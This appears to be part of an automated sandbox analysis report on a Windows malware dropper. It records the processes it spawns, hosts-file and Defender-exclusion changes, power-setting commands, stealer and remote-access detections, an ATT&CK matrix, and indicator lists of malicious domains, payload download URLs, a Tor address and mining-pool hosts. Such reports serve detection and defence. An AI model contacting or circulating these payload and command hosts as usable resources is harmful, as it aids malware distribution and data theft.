gA,SetFileShortNameW,InterlockedPushEntrySList,QueryDosDeviceA,BuildCommDCBAndTimeoutsW,QueryPerformanceFrequency,FindNextFileW,SetCommState,VerifyVersionInfoW,FindNextVolumeMountPointW,SetCalendarInfoA,GetShortPathNameW,GetVolumePathNameW,GetVolumeNameForVolumeMountPointA,GetConsoleAliasesLengthA,TlsFree,GetDriveTypeW,SetComputerNameA,Process32FirstW,GetFileAttributesA,GetStringTypeW,GetStringTypeW,GetDriveTypeA,GetSystemWindowsDirectoryA,InterlockedPopEntrySList,EnumSystemLocalesW,GetCommState,IsWow64Process,GetSystemDirectoryA,GetTempPathW,AddAtomW,GetSystemWindowsDirectoryW,DisconnectNamedPipe,AddAtomW,GetSystemWindowsDirectoryW,DisconnectNamedPipe,GetConsoleMode,VirtualProtect,InterlockedIncrement,GetCharWidthFloatA,InterlockedIncrement,GetCharWidthFloatA,ClearEventLogA,GlobalUnfix,OpenWaitableTimerA,GlobalFlags,LocalFlags,_llseek,GetDlgCtrlID,DebugActiveProcess,GetDlgCtrlID,DebugActiveProcess,WritePrivateProfileSectionW,SleepEx,GetUserDefaultLangID,_llseek,GlobalUnlock,InitiateSystemShutdownA,AbortSystemShutdownW,WinHttpReadData,WinHttpOpen,WinHttpWriteData,RevertToSelf,LoadLibraryW,GetConsoleCursorInfo,GetConsoleOutputCP,TerminateProcess,FindFirstFileW,InterlockedDecrement,GetModuleHandleW,CreateActCtxW,_lclose,ReadConsoleW,GetNamedPipeHandleStateW,GlobalFindAtomW,lstrlenA,GetModuleHandleA,VerLanguageNameW,CreateEventW,ExpandEnvironmentStringsA,GetProcessAffinityMask,SetTimeZoneInformation,ActivateActCtx,DeleteVolumeMountPointA,3_2_00429C40
                          Source: C:\Users\user\AppData\Local\Temp\InstallSetup5.exeCode function: 2_2_00403532 EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrlenW,wsprintfW,GetFileAttributesW,DeleteFileW,SetCurrentDirectoryW,CopyFileW,OleUninitialize,ExitProcess,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,2_2_00403532

                          Lowering of HIPS / PFW / Operating System Security Settings

                          barindex
                          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\powercfg.exe powercfg /x -hibernate-timeout-ac 0
                          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\powercfg.exe powercfg /x -standby-timeout-ac 0
                          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\powercfg.exe powercfg /x -hibernate-timeout-ac 0
                          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\powercfg.exe powercfg /x -standby-timeout-ac 0
                          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\powercfg.exe powercfg /x -hibernate-timeout-ac 0
                          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\powercfg.exe powercfg /x -standby-timeout-ac 0
                          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\powercfg.exe powercfg /x -hibernate-timeout-ac 0
                          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\powercfg.exe powercfg /x -standby-timeout-ac 0
                          Source: C:\Users\user\AppData\Local\Temp\latestX.exeFile written: C:\Windows\System32\drivers\etc\hostsJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\e0cbefcb1af40c7d4aff4aca26621a98.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT displayName FROM AntiVirusProduct

                          Stealing of Sensitive Information

                          barindex
                          Source: Yara matchFile source: 57.2.cdttvvc.a515a0.1.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 9.2.toolspub2.exe.400000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 3.2.toolspub2.exe.8315a0.1.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 59.2.cdttvvc.400000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 0000003B.00000002.2612282713.00000000004C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000009.00000002.2281261302.00000000004E1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000009.00000002.2281176476.00000000004B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 0000003B.00000002.2612331641.00000000004E1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 5.2.e0cbefcb1af40c7d4aff4aca26621a98.exe.2f70e67.8.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 17.2.e0cbefcb1af40c7d4aff4aca26621a98.exe.2f10e67.14.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 17.2.e0cbefcb1af40c7d4aff4aca26621a98.exe.400000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 5.2.e0cbefcb1af40c7d4aff4aca26621a98.exe.400000.5.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 17.3.e0cbefcb1af40c7d4aff4aca26621a98.exe.3800000.4.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 5.3.e0cbefcb1af40c7d4aff4aca26621a98.exe.3860000.7.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 00000005.00000003.2160724822.0000000003CA2000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000005.00000002.4559431109.0000000000843000.00000040.00000001.01000000.00000009.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000005.00000002.4576083277.00000000033B3000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000011.00000003.2270531809.0000000003C42000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000011.00000002.4560534739.0000000000843000.00000040.00000001.01000000.00000009.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000011.00000002.4575750686.0000000003353000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: Process Memory Space: e0cbefcb1af40c7d4aff4aca26621a98.exe PID: 3392, type: MEMORYSTR

                          Remote Access Functionality

                          barindex
                          Source: Yara matchFile source: 57.2.cdttvvc.a515a0.1.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 9.2.toolspub2.exe.400000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 3.2.toolspub2.exe.8315a0.1.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 59.2.cdttvvc.400000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 0000003B.00000002.2612282713.00000000004C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000009.00000002.2281261302.00000000004E1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000009.00000002.2281176476.00000000004B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 0000003B.00000002.2612331641.00000000004E1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 5.2.e0cbefcb1af40c7d4aff4aca26621a98.exe.2f70e67.8.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 17.2.e0cbefcb1af40c7d4aff4aca26621a98.exe.2f10e67.14.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 17.2.e0cbefcb1af40c7d4aff4aca26621a98.exe.400000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 5.2.e0cbefcb1af40c7d4aff4aca26621a98.exe.400000.5.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 17.3.e0cbefcb1af40c7d4aff4aca26621a98.exe.3800000.4.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 5.3.e0cbefcb1af40c7d4aff4aca26621a98.exe.3860000.7.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 00000005.00000003.2160724822.0000000003CA2000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000005.00000002.4559431109.0000000000843000.00000040.00000001.01000000.00000009.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000005.00000002.4576083277.00000000033B3000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000011.00000003.2270531809.0000000003C42000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000011.00000002.4560534739.0000000000843000.00000040.00000001.01000000.00000009.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000011.00000002.4575750686.0000000003353000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: Process Memory Space: e0cbefcb1af40c7d4aff4aca26621a98.exe PID: 3392, type: MEMORYSTR
                          Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpactResource DevelopmentReconnaissance
                          Valid Accounts21
                          Windows Management Instrumentation
                          11
                          DLL Side-Loading
                          11
                          DLL Side-Loading
                          1
                          File and Directory Permissions Modification
                          OS Credential Dumping1
                          System Time Discovery
                          Remote Services1
                          Archive Collected Data
                          Exfiltration Over Other Network Medium1
                          Web Service
                          Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without Authorization1
                          System Shutdown/Reboot
                          Acquire InfrastructureGather Victim Identity Information
                          Default Accounts3
                          Native API
                          11
                          Windows Service
                          1
                          Access Token Manipulation
                          11
                          Disable or Modify Tools
                          LSASS Memory2
                          File and Directory Discovery
                          Remote Desktop Protocol1
                          Clipboard Data
                          Exfiltration Over Bluetooth3
                          Ingress Tool Transfer
                          SIM Card SwapObtain Device Cloud BackupsNetwork Denial of ServiceDomainsCredentials
                          Domain Accounts1
                          Exploitation for Client Execution
                          1
                          Scheduled Task/Job
                          11
                          Windows Service
                          1
                          Deobfuscate/Decode Files or Information
                          Security Account Manager27
                          System Information Discovery
                          SMB/Windows Admin SharesData from Network Shared DriveAutomated Exfiltration11
                          Encrypted Channel
                          Data Encrypted for ImpactDNS ServerEmail Addresses
                          Local Accounts13
                          Command and Scripting Interpreter
                          Login Hook813
                          Process Injection
                          4
                          Obfuscated Files or Information
                          NTDS551
                          Security Software Discovery
                          Distributed Component Object ModelInput CaptureTraffic Duplication1
                          Non-Standard Port
                          Data DestructionVirtual Private ServerEmployee Names
                          Cloud Accounts1
                          Scheduled Task/Job
                          Network Logon Script1
                          Scheduled Task/Job
                          22
                          Software Packing
                          LSA Secrets251
                          Virtualization/Sandbox Evasion
                          SSHKeyloggingScheduled Transfer4
                          Non-Application Layer Protocol
                          Data Encrypted for ImpactServerGather Victim Network Information
                          Replication Through Removable Media1
                          Service Execution
                          RC ScriptsRC Scripts11
                          DLL Side-Loading
                          Cached Domain Credentials3
                          Process Discovery
                          VNCGUI Input CaptureData Transfer Size Limits115
                          Application Layer Protocol
                          Service StopBotnetDomain Properties
                          External Remote Services1
                          PowerShell
                          Startup ItemsStartup Items1
                          File Deletion
                          DCSync1
                          Application Window Discovery
                          Windows Remote ManagementWeb Portal CaptureExfiltration Over C2 Channel1
                          Proxy
                          Inhibit System RecoveryWeb ServicesDNS
                          Drive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job33
                          Masquerading
                          Proc Filesystem1
                          Remote System Discovery
                          Cloud ServicesCredential API HookingExfiltration Over Alternative ProtocolApplication Layer ProtocolDefacementServerlessNetwork Trust Dependencies
                          Exploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt251
                          Virtualization/Sandbox Evasion
                          /etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedExfiltration Over Symmetric Encrypted Non-C2 ProtocolWeb ProtocolsInternal DefacementMalvertisingNetwork Topology
                          Supply Chain CompromisePowerShellCronCron1
                          Access Token Manipulation
                          Network SniffingNetwork Service DiscoveryShared WebrootLocal Data StagingExfiltration Over Asymmetric Encrypted Non-C2 ProtocolFile Transfer ProtocolsExternal DefacementCompromise InfrastructureIP Addresses
                          Compromise Software Dependencies and Development ToolsAppleScriptLaunchdLaunchd813
                          Process Injection
                          Input CaptureSystem Network Connections DiscoverySoftware Deployment ToolsRemote Data StagingExfiltration Over Unencrypted Non-C2 ProtocolMail ProtocolsFirmware CorruptionDomainsNetwork Security Appliances
                          Compromise Software Supply ChainWindows Command ShellScheduled TaskScheduled Task1
                          Hidden Files and Directories
                          KeyloggingProcess DiscoveryTaint Shared ContentScreen CaptureExfiltration Over Physical MediumDNSResource HijackingDNS ServerGather Victim Org Information
                          Compromise Hardware Supply ChainUnix ShellSystemd TimersSystemd Timers1
                          Indicator Removal
                          GUI Input CapturePermission Groups DiscoveryReplication Through Removable MediaEmail CollectionExfiltration over USBProxyNetwork Denial of ServiceVirtual Private ServerDetermine Physical Locations
                          Hide Legend

                          Legend:

                          • Process
                          • Signature
                          • Created File
                          • DNS/IP Info
                          • Is Dropped
                          • Is Windows Process
                          • Number of created Registry Values
                          • Number of created Files
                          • Visual Basic
                          • Delphi
                          • Java
                          • .Net C# or VB.NET
                          • C, C++ or other language
                          • Is malicious
                          • Internet
                          behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1340695 Sample: file.exe Startdate: 10/11/2023 Architecture: WINDOWS Score: 100 115 host-host-file8.com 2->115 117 host-file-host6.com 2->117 119 2 other IPs or domains 2->119 127 Found malware configuration 2->127 129 Malicious sample detected (through community Yara rule) 2->129 131 Antivirus detection for URL or domain 2->131 133 16 other signatures 2->133 11 file.exe 6 2->11         started        15 updater.exe 2->15         started        17 cdttvvc 2->17         started        19 4 other processes 2->19 signatures3 process4 file5 101 C:\Users\user\AppData\Local\...\toolspub2.exe, PE32 11->101 dropped 103 C:\Users\user\AppData\Local\...\latestX.exe, PE32+ 11->103 dropped 105 C:\...\e0cbefcb1af40c7d4aff4aca26621a98.exe, PE32 11->105 dropped 107 C:\Users\user\AppData\...\InstallSetup5.exe, PE32 11->107 dropped 181 Tries to detect sandboxes and other dynamic analysis tools (process name or module or function) 11->181 21 toolspub2.exe 11->21         started        24 latestX.exe 1 11->24         started        27 e0cbefcb1af40c7d4aff4aca26621a98.exe 13 11->27         started        29 InstallSetup5.exe 9 11->29         started        109 C:\Windows\Temp\whxcdqscjswq.tmp, PE32+ 15->109 dropped 111 C:\Program Filesbehaviorgraphoogle\Libs\WR64.sys, PE32+ 15->111 dropped 183 Suspicious powershell command line found 15->183 185 Protects its processes via BreakOnTermination flag 15->185 187 Injects code into the Windows Explorer (explorer.exe) 15->187 201 5 other signatures 15->201 189 Multi AV Scanner detection for dropped file 17->189 191 Detected unpacking (changes PE section rights) 17->191 193 Machine Learning detection for dropped file 17->193 195 Injects a PE file into a foreign processes 17->195 31 cdttvvc 17->31         started        197 Uses powercfg.exe to modify the power settings 19->197 199 Modifies power options to not sleep / hibernate 19->199 33 sc.exe 19->33         started        35 conhost.exe 19->35         started        37 conhost.exe 19->37         started        39 4 other processes 19->39 signatures6 process7 file8 145 Multi AV Scanner detection for dropped file 21->145 147 Detected unpacking (changes PE section rights) 21->147 149 Machine Learning detection for dropped file 21->149 167 2 other signatures 21->167 41 toolspub2.exe 21->41         started        95 C:\Program Filesbehaviorgraphoogle\Chrome\updater.exe, PE32+ 24->95 dropped 97 C:\Windows\System32\drivers\etc\hosts, ASCII 24->97 dropped 151 Suspicious powershell command line found 24->151 153 Modifies the hosts file 24->153 155 Adds a directory exclusion to Windows Defender 24->155 157 Detected unpacking (overwrites its own PE header) 27->157 159 Found Tor onion address 27->159 161 Tries to detect sandboxes and other dynamic analysis tools (process name or module or function) 27->161 44 e0cbefcb1af40c7d4aff4aca26621a98.exe 27->44         started        46 powershell.exe 24 27->46         started        99 C:\Users\user\AppData\Local\Temp\Broom.exe, PE32 29->99 dropped 48 Broom.exe 2 6 29->48         started        163 Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation)) 31->163 165 Maps a DLL or memory area into another process 31->165 169 2 other signatures 31->169 50 conhost.exe 33->50         started        52 sc.exe 33->52         started        54 sc.exe 33->54         started        56 3 other processes 33->56 signatures9 process10 signatures11 171 Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation)) 41->171 173 Maps a DLL or memory area into another process 41->173 175 Checks if the current machine is a virtual machine (disk enumeration) 41->175 177 Creates a thread in another existing process (thread injection) 41->177 58 explorer.exe 41->58 injected 63 powershell.exe 44->63         started        65 conhost.exe 46->65         started        179 Multi AV Scanner detection for dropped file 48->179 process12 dnsIp13 125 host-host-file8.com 95.214.26.28, 49715, 49725, 49726 CMCSUS Germany 58->125 113 C:\Users\user\AppData\Roaming\cdttvvc, PE32 58->113 dropped 203 System process connects to network (likely due to code injection or exploit) 58->203 205 Benign windows process drops PE files 58->205 207 Suspicious powershell command line found 58->207 209 3 other signatures 58->209 67 explorer.exe 58->67         started        71 conhost.exe 58->71         started        73 cmd.exe 58->73         started        77 8 other processes 58->77 75 conhost.exe 63->75         started        file14 signatures15 process16 dnsIp17 121 51.15.58.224, 14433, 49718, 49720 OnlineSASFR France 67->121 123 pastebin.com 172.67.34.170, 443, 49719 CLOUDFLARENETUS United States 67->123 135 System process connects to network (likely due to code injection or exploit) 67->135 137 Query firmware table information (likely to detect VMs) 67->137 139 Suspicious powershell command line found 71->139 141 Adds a directory exclusion to Windows Defender 71->141 143 Modifies power options to not sleep / hibernate 73->143 79 conhost.exe 73->79         started        81 powercfg.exe 73->81         started        83 powercfg.exe 73->83         started        91 2 other processes 73->91 85 conhost.exe 77->85         started        87 conhost.exe 77->87         started        89 conhost.exe 77->89         started        93 8 other processes 77->93 signatures18 process19

                          This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                          windows-stand
                          SourceDetectionScannerLabelLink
                          file.exe74%ReversingLabsByteCode-MSIL.Trojan.Privateloader
                          file.exe100%AviraHEUR/AGEN.1357339
                          file.exe100%Joe Sandbox ML
                          SourceDetectionScannerLabelLink
                          C:\Users\user\AppData\Local\Temp\latestX.exe100%Joe Sandbox ML
                          C:\Users\user\AppData\Local\Temp\e0cbefcb1af40c7d4aff4aca26621a98.exe100%Joe Sandbox ML
                          C:\Program Files\Google\Chrome\updater.exe100%Joe Sandbox ML
                          C:\Users\user\AppData\Roaming\cdttvvc100%Joe Sandbox ML
                          C:\Users\user\AppData\Local\Temp\toolspub2.exe100%Joe Sandbox ML
                          C:\Windows\Temp\whxcdqscjswq.tmp100%Joe Sandbox ML
                          C:\Program Files\Google\Chrome\updater.exe71%ReversingLabsWin64.Trojan.Amadey
                          C:\Program Files\Google\Libs\WR64.sys5%ReversingLabs
                          C:\Users\user\AppData\Local\Temp\Broom.exe21%ReversingLabsWin32.Trojan.Malgent
                          C:\Users\user\AppData\Local\Temp\InstallSetup5.exe50%ReversingLabsWin32.Trojan.Amadey
                          C:\Users\user\AppData\Local\Temp\e0cbefcb1af40c7d4aff4aca26621a98.exe47%ReversingLabsWin32.Trojan.Babar
                          C:\Users\user\AppData\Local\Temp\latestX.exe71%ReversingLabsWin64.Trojan.Amadey
                          C:\Users\user\AppData\Local\Temp\toolspub2.exe34%ReversingLabsWin32.Trojan.Generic
                          C:\Users\user\AppData\Roaming\cdttvvc34%ReversingLabsWin32.Trojan.Generic
                          C:\Windows\Temp\whxcdqscjswq.tmp64%ReversingLabsWin64.PUA.DacicBitCoinMiner
                          No Antivirus matches
                          No Antivirus matches
                          SourceDetectionScannerLabelLink
                          http://invalidlog.txtlookup0%URL Reputationsafe
                          http://host-host-file8.com/100%URL Reputationmalware
                          http://devlog.gregarius.net/docs/ua)Links0%URL Reputationsafe
                          http://www.exabot.com/go/robot)Opera/9.800%URL Reputationsafe
                          http://www.googlebot.com/bot.html)Links0%URL Reputationsafe
                          http://www.alltheweb.com/help/webmaster/crawler)Mozilla/5.00%URL Reputationsafe
                          https://allstatsin.ruhttp://vcr4vuv4sf5233btfy7xboezl7umjw7rljdmaeztmmf4s6k2ivinj3yd.onion0%Avira URL Cloudsafe
                          https://allstatsin.ruhttp://vcr4vuv4sf5233btfy7xboezl7umjw7rljdmaeztmmf4s6k2ivinj3yd.onionhttps://al0%Avira URL Cloudsafe
                          https://allstatsin.ruhttp://vcr4vuv4sf5233btfy7xboezl7umjw7rljdmaeztmmf4s6k2ivinj3yd.onionS-1-5-21-20%Avira URL Cloudsafe
                          http://misc.yahoo.com.cn/help.html)QueryPerformanceFrequency0%URL Reputationsafe
                          http://host-file-host6.com/100%URL Reputationmalware
                          http://grub.org)Mozilla/5.00%Avira URL Cloudsafe
                          http://www.avantbrowser.com)MOT-V9mm/0%Avira URL Cloudsafe
                          http://crl.g0%URL Reputationsafe
                          https://blockchain.infoindex0%URL Reputationsafe
                          https://raw.githubusercontent.com/spesmilo/electrum/master/electrum/servers.jsonsize0%Avira URL Cloudsafe
                          http://www.bloglines.com)Frame0%Avira URL Cloudsafe
                          http://fontawesome.iohttp://fontawesome.iohttp://fontawesome.io/license/http://fontawesome.io/licens0%Avira URL Cloudsafe
                          http://vcr4vuv4sf5233btfy7xboezl7umjw7rljdmaeztmmf4s6k2ivinj3yd.oniontls:0%Avira URL Cloudsafe
                          https://allstatsin.ru100%Avira URL Cloudmalware
                          http://jesuscolin.top/syncUpd.exehttps://iplogger.com/1aiQK4SOFTWARE100%Avira URL Cloudmalware
                          http://vcr4vuv4sf5233btfy7xboezl7umjw7rljdmaeztmmf4s6k2ivinj3yd.onion100%Avira URL Cloudmalware
                          http://lazzarotata.icu/syncUpd.exedownload_quiet100%Avira URL Cloudmalware
                          http://91.92.254.7/scripts/plus.php?ip=0%Avira URL Cloudsafe
                          http://www.broomcleaner.com/buyOpen0%Avira URL Cloudsafe
                          http://www.spidersoft.com)0%Avira URL Cloudsafe
                          https://blockstream.info/apiinva0%Avira URL Cloudsafe
                          http://https://_bad_pdb_file.pdb0%Avira URL Cloudsafe
                          http://www.google.c0%Avira URL Cloudsafe
                          https://allstatsin.ruhttps://allstatsin.ruRegQueryValueExWhttps://allstatsin.ruUUIDUUIDPGDSE64-bitNe0%Avira URL Cloudsafe
                          http://www.avantbrowser.com)MOT-V9mm/00.620%Avira URL Cloudsafe
                          http://localhost:3433/https://duniadekho.baridna:0%Avira URL Cloudsafe
                          http://vcr4vuv4sf5233btfy7xboezl7umjw7rljdmaeztmmf4s6k2ivinj3yd.onionhttp://vcr4vuv4sf5233btfy7xboez0%Avira URL Cloudsafe
                          NameIPActiveMaliciousAntivirus DetectionReputation
                          host-host-file8.com
                          95.214.26.28
                          truetrue
                            unknown
                            xmr-eu1.nanopool.org
                            163.172.154.142
                            truefalse
                              high
                              pastebin.com
                              172.67.34.170
                              truefalse
                                high
                                host-file-host6.com
                                unknown
                                unknowntrue
                                  unknown
                                  NameMaliciousAntivirus DetectionReputation
                                  http://host-host-file8.com/true
                                  • URL Reputation: malware
                                  unknown
                                  https://pastebin.com/raw/cZ2J3Upifalse
                                    high
                                    http://host-file-host6.com/true
                                    • URL Reputation: malware
                                    unknown
                                    NameSourceMaliciousAntivirus DetectionReputation
                                    https://allstatsin.ruhttp://vcr4vuv4sf5233btfy7xboezl7umjw7rljdmaeztmmf4s6k2ivinj3yd.onione0cbefcb1af40c7d4aff4aca26621a98.exe, 00000005.00000002.4581440051.000000000C11A000.00000004.00001000.00020000.00000000.sdmptrue
                                    • Avira URL Cloud: safe
                                    unknown
                                    http://fontawesome.ioBroom.exe, 00000004.00000000.2108968497.00000000008CD000.00000002.00000001.01000000.00000008.sdmpfalse
                                      high
                                      http://invalidlog.txtlookupe0cbefcb1af40c7d4aff4aca26621a98.exefalse
                                      • URL Reputation: safe
                                      unknown
                                      https://allstatsin.ruhttp://vcr4vuv4sf5233btfy7xboezl7umjw7rljdmaeztmmf4s6k2ivinj3yd.onionhttps://ale0cbefcb1af40c7d4aff4aca26621a98.exe, 00000005.00000002.4581440051.000000000C0BA000.00000004.00001000.00020000.00000000.sdmptrue
                                      • Avira URL Cloud: safe
                                      unknown
                                      http://yandex.com/bots)Operae0cbefcb1af40c7d4aff4aca26621a98.exefalse
                                        high
                                        https://allstatsin.ruhttp://vcr4vuv4sf5233btfy7xboezl7umjw7rljdmaeztmmf4s6k2ivinj3yd.onionS-1-5-21-2e0cbefcb1af40c7d4aff4aca26621a98.exe, 00000005.00000002.4581440051.000000000C0F2000.00000004.00001000.00020000.00000000.sdmptrue
                                        • Avira URL Cloud: safe
                                        unknown
                                        https://allstatsin.rue0cbefcb1af40c7d4aff4aca26621a98.exe, 00000005.00000002.4581440051.000000000C0BA000.00000004.00001000.00020000.00000000.sdmp, e0cbefcb1af40c7d4aff4aca26621a98.exe, 00000005.00000002.4581440051.000000000C09C000.00000004.00001000.00020000.00000000.sdmptrue
                                        • Avira URL Cloud: malware
                                        unknown
                                        https://github.com/Snawoot/opera-proxy/releases/download/v1.2.2/opera-proxy.windows-386.exeBlackBerre0cbefcb1af40c7d4aff4aca26621a98.exefalse
                                          high
                                          http://devlog.gregarius.net/docs/ua)Linkse0cbefcb1af40c7d4aff4aca26621a98.exefalse
                                          • URL Reputation: safe
                                          unknown
                                          http://www.broomcleaner.com/buyOpenBroom.exe, 00000004.00000000.2106864524.0000000000401000.00000020.00000001.01000000.00000008.sdmpfalse
                                          • Avira URL Cloud: safe
                                          unknown
                                          http://grub.org)Mozilla/5.0e0cbefcb1af40c7d4aff4aca26621a98.exefalse
                                          • Avira URL Cloud: safe
                                          low
                                          https://raw.githubusercontent.com/spesmilo/electrum/master/electrum/servers.jsonsizee0cbefcb1af40c7d4aff4aca26621a98.exefalse
                                          • Avira URL Cloud: safe
                                          unknown
                                          http://www.avantbrowser.com)MOT-V9mm/e0cbefcb1af40c7d4aff4aca26621a98.exefalse
                                          • Avira URL Cloud: safe
                                          low
                                          https://cdn.discordapp.com/attachments/1088058556286251082/1111230812579450950/TsgVtmYNoFT.zipMozille0cbefcb1af40c7d4aff4aca26621a98.exefalse
                                            high
                                            http://jesuscolin.top/syncUpd.exehttps://iplogger.com/1aiQK4SOFTWAREInstallSetup5.exe, 00000002.00000002.4569490884.0000000000628000.00000004.00000020.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: malware
                                            unknown
                                            https://turnitin.com/robot/crawlerinfo.html)cannote0cbefcb1af40c7d4aff4aca26621a98.exefalse
                                              high
                                              http://www.exabot.com/go/robot)Opera/9.80e0cbefcb1af40c7d4aff4aca26621a98.exefalse
                                              • URL Reputation: safe
                                              unknown
                                              http://www.bloglines.com)Framee0cbefcb1af40c7d4aff4aca26621a98.exefalse
                                              • Avira URL Cloud: safe
                                              low
                                              http://api.ipify.org/?format=qqq/SILENTget1023InstallSetup5.exe, 00000002.00000002.4569490884.0000000000628000.00000004.00000020.00020000.00000000.sdmpfalse
                                                high
                                                http://www.googlebot.com/bot.html)Linkse0cbefcb1af40c7d4aff4aca26621a98.exefalse
                                                • URL Reputation: safe
                                                unknown
                                                http://lazzarotata.icu/syncUpd.exedownload_quietInstallSetup5.exe, 00000002.00000002.4569490884.0000000000628000.00000004.00000020.00020000.00000000.sdmpfalse
                                                • Avira URL Cloud: malware
                                                unknown
                                                http://search.msn.com/msnbot.htm)net/http:e0cbefcb1af40c7d4aff4aca26621a98.exefalse
                                                  high
                                                  http://www.alltheweb.com/help/webmaster/crawler)Mozilla/5.0e0cbefcb1af40c7d4aff4aca26621a98.exefalse
                                                  • URL Reputation: safe
                                                  unknown
                                                  http://91.92.254.7/scripts/plus.php?ip=InstallSetup5.exe, 00000002.00000002.4569490884.0000000000628000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  unknown
                                                  http://fontawesome.iohttp://fontawesome.iohttp://fontawesome.io/license/http://fontawesome.io/licensBroom.exe, 00000004.00000000.2108968497.00000000008CD000.00000002.00000001.01000000.00000008.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  unknown
                                                  http://vcr4vuv4sf5233btfy7xboezl7umjw7rljdmaeztmmf4s6k2ivinj3yd.onione0cbefcb1af40c7d4aff4aca26621a98.exe, 00000005.00000002.4581440051.000000000C0BA000.00000004.00001000.00020000.00000000.sdmp, e0cbefcb1af40c7d4aff4aca26621a98.exe, 00000005.00000002.4581440051.000000000C0D0000.00000004.00001000.00020000.00000000.sdmptrue
                                                  • Avira URL Cloud: malware
                                                  unknown
                                                  http://www.google.com/bot.html)crypto/ecdh:e0cbefcb1af40c7d4aff4aca26621a98.exefalse
                                                    high
                                                    http://vcr4vuv4sf5233btfy7xboezl7umjw7rljdmaeztmmf4s6k2ivinj3yd.oniontls:e0cbefcb1af40c7d4aff4aca26621a98.exetrue
                                                    • Avira URL Cloud: safe
                                                    unknown
                                                    http://search.msn.com/msnbot.htm)msnbot/1.1e0cbefcb1af40c7d4aff4aca26621a98.exefalse
                                                      high
                                                      https://blockstream.info/apiinvae0cbefcb1af40c7d4aff4aca26621a98.exefalse
                                                      • Avira URL Cloud: safe
                                                      unknown
                                                      http://www.archive.org/details/archive.org_bot)Opera/9.80e0cbefcb1af40c7d4aff4aca26621a98.exefalse
                                                        high
                                                        http://www.baidu.com/search/spider.htm)MobileSafari/600.1.4e0cbefcb1af40c7d4aff4aca26621a98.exefalse
                                                          high
